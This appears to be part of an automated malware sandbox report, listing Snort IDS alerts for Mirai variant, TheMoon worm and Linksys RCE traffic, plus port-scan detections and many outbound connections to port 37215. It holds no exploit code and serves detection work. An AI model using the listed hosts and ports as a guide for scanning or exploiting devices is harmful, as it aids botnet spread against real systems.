    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.212.208:8080 -> 192.168.2.23:39856
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50356 -> 88.249.106.177:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.100.206:8080 -> 192.168.2.23:35406
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48416 -> 172.65.224.97:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48416 -> 172.65.224.97:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48416 -> 172.65.224.97:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46216 -> 95.100.143.229:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51224 -> 95.101.211.92:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36178 -> 95.101.223.243:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49134 -> 112.185.114.150:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.244.52:80 -> 192.168.2.23:44892
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41870 -> 95.110.200.99:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41872 -> 95.110.200.99:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51230 -> 95.68.168.28:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46876 -> 95.97.47.219:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45494 -> 112.221.100.26:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46432 -> 95.217.157.99:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54998 -> 172.65.164.242:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54998 -> 172.65.164.242:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54998 -> 172.65.164.242:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37776 -> 172.65.150.10:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37776 -> 172.65.150.10:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:37776 -> 172.65.150.10:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.34.38:8080 -> 192.168.2.23:60638
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.217.196:8080 -> 192.168.2.23:43950
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.45.62:8080 -> 192.168.2.23:50370
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36492 -> 95.101.178.142:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44308 -> 95.173.182.107:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36374 -> 95.245.162.42:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35638 -> 112.185.220.208:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47456 -> 95.163.16.244:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 31.40.225.64:8080 -> 192.168.2.23:42218
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.92.129:8080 -> 192.168.2.23:48796
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52058 -> 172.65.117.43:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52058 -> 172.65.117.43:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52058 -> 172.65.117.43:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38766 -> 88.99.192.119:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50328 -> 88.208.220.164:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.251.93:80 -> 192.168.2.23:54530
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34948 -> 88.248.58.29:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35956 -> 88.2.132.89:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58268 -> 112.180.0.18:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55514 -> 172.65.197.79:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55514 -> 172.65.197.79:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55514 -> 172.65.197.79:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50602 -> 112.109.59.119:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.222.63:80 -> 192.168.2.23:48304
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56830 -> 88.250.124.246:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39720 -> 88.17.94.43:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59490 -> 112.72.60.233:80
    Connects to many ports of the same IP (likely port scanning)
    Source: global trafficTCP traffic: 197.8.24.231 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.15.248.9 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.9.71.106 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.7.227.200 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.111.93.208 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.47.5.180 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.173.8.22 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.73.170.69 ports 1,2,3,5,7,37215
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 38292 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49558 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55738 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48252 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35678 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43132 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53162 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56702 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44450 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34220 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43006 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33992 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33520 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54926 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54302 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 54302
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56472 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44848 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33478 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41000 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 41000
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56830 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58976 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37706 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 37706
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48830 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 48830
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52452 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46776 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34728 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47084 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43446 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57450 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44830 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52576 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 52576
    Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 46582
    Source: unknownNetwork traffic detected: HTTP traffic on port 39328 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42794 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48806 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53170 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36954 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59204 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54428 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34018 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55118 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59500 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39910 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 59500
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 39910
    Source: unknownNetwork traffic detected: HTTP traffic on port 59672 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60054 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52658 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54894 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42232 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40308 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36450 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59318 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41280 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47862 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55064 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43070 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33114 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56496 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35412 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36176 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55510 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60928 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33232 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59846 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59842 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58536 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58054 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52394 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36414 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35404 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45636 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55700 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60612 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53156 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60186 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44790 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59542 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35434 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42688 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33770 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48556 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52266 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52722 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46778 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 46778
    Source: unknownNetwork traffic detected: HTTP traffic on port 57638 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 57638
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56244 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47782 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48416 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60432 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60432
    Source: unknownNetwork traffic detected: HTTP traffic on port 54998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37776 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52058 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55514 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55454 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 49552
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57526 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60374 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 57526
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56110 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48750 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55988 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40044 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40554 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55240 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33074 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49050 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48822 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54108 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41768 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42430 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36036 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41490 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43398 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35994 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38270 -> 55555
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.147.68.87:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.116.46.154:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.6.126.245:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.210.94.82:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.173.75.36:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.171.222.87:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.56.37.201:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.63.201.206:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.159.30.71:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.240.253.181:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.30.165.156:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.26.135.245:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.228.53.182:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.40.49.5:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.99.19.230:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.77.128.68:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.152.55.230:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.231.24.141:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.178.103.146:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.230.34.85:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.122.95.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.196.13.53:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.186.218.16:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.217.233.211:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.173.67.197:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.78.88.49:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.84.197.160:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.209.173.189:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.168.58.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.134.252.119:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.91.124.55:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.174.8.68:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.118.44.139:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.88.151.97:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.33.153.74:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.134.59.145:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.94.159.203:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.50.214.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.248.141.49:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.51.27.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.224.84.111:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.128.46.99:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.159.238.19:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.218.144.7:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.177.190.6:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.216.164.178:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.177.165.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.207.231.136:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.5.209.3:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.168.164.22:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.201.246.141:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.210.194.124:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.202.176.29:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.107.137.31:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.133.2.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.204.230.106:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.34.25.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.183.138.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.184.84.40:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.159.186.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.98.114.71:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.69.4.51:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.58.214.105:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.101.167.4:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.37.43.67:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.108.252.84:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.46.218.114:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.202.26.73:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.80.31.196:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.93.237.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.191.249.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.104.220.42:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.188.97.39:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.213.188.155:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.209.187.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.156.225.83:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.185.64.62:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.118.34.84:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.114.199.206:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.47.5.180:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.24.177.220:37215
